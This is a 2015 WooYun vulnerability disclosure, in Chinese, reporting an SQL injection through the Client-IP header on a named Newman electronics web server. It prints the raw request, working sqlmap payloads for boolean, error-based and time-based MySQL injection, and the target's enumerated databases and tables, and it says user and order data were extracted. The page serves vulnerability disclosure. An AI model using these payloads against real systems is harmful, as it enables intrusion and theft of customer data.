当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112802

漏洞标题:纽曼某站HTTP头存在SQL注入泄露大量信息

相关厂商:纽曼电子

漏洞作者: 深度安全实验室

提交时间:2015-05-08 11:10

修复时间:2015-05-13 11:12

公开时间:2015-05-13 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://newadmin.newman.mobi


GET /goods.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
Cookie: PHPSESSID=pth8dqd7i7tfchv4fk4qashtn0; ECS[history]=35%2C75%2C116; ECS[display]=grid
Host: newadmin.newman.mobi
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

Client-IP参数有问题~

11.png


库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Client-IP #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'
---
back-end DBMS: MySQL 5.0
available databases [6]:
[*] information_schema
[*] mysql
[*] newsmy-bbs
[*] newsmy-uc
[*] newsmy-www
[*] performance_schema

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Client-IP #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'
---
back-end DBMS: MySQL 5.0
Database: newsmy-www
[117 tables]
+---------------------------+
| apptemp |
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_fm |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_copy |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_miaosha |
| ecs_miaosha_0401 |
| ecs_miaosha_copy |
| ecs_nav |
| ecs_order_action |
| ecs_order_action_04012020 |
| ecs_order_goods |
| ecs_order_goods_04012020 |
| ecs_order_goods_copy |
| ecs_order_info |
| ecs_order_info_04012020 |
| ecs_order_info_14 |
| ecs_order_info_copy0819 |
| ecs_order_info_copy1 |
| ecs_order_info_copy2 |
| ecs_order_info_copy3 |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_pay_log_04012020 |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_users_copy |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_weibo |
| ecs_wholesale |
| ecs_yuding |
| ecs_yuding_140121 |
| ecs_yuding_copy |
| ecs_yuding_dj |
| ecs_yuding_pay |
| order_info |
| session_mem |
| session_wcore |
| temp_user |
| yd1111 |
| yuding |
+---------------------------+

漏洞证明:

用户信息:

12.png

取某些关键字段看看:

3.jpg

订单信息:

13.png

取某些关键字段看看:

5.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-13 11:12

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-13 21:44 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 我是来学习滴~~)

    竟然忽略~~~Client-IP参数怎么利用呢,没看明白,求科普~~~

  2. 2015-05-13 22:37 | Zzzz~ ( 路人 | Rank:0 漏洞数:3 | 坚持自己的!)

    厂家真大方

  3. 2015-05-14 09:46 | 大大怪 ( 路人 | Rank:0 漏洞数:1 | PHP 爱好者)

    @Soulmk ClientIp 是使用头信息发送的,一般用于,后端有代理分离的时候,使用这个得到用户的真实ip。 由于是 头信息发送的,所以不受 自动加引号转换的程式,影响,而又没有自行过滤,导致此问题。

  4. 2015-05-14 18:45 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 我是来学习滴~~)

    噢噢,晓得咯~~学习啦!谢谢指教~~~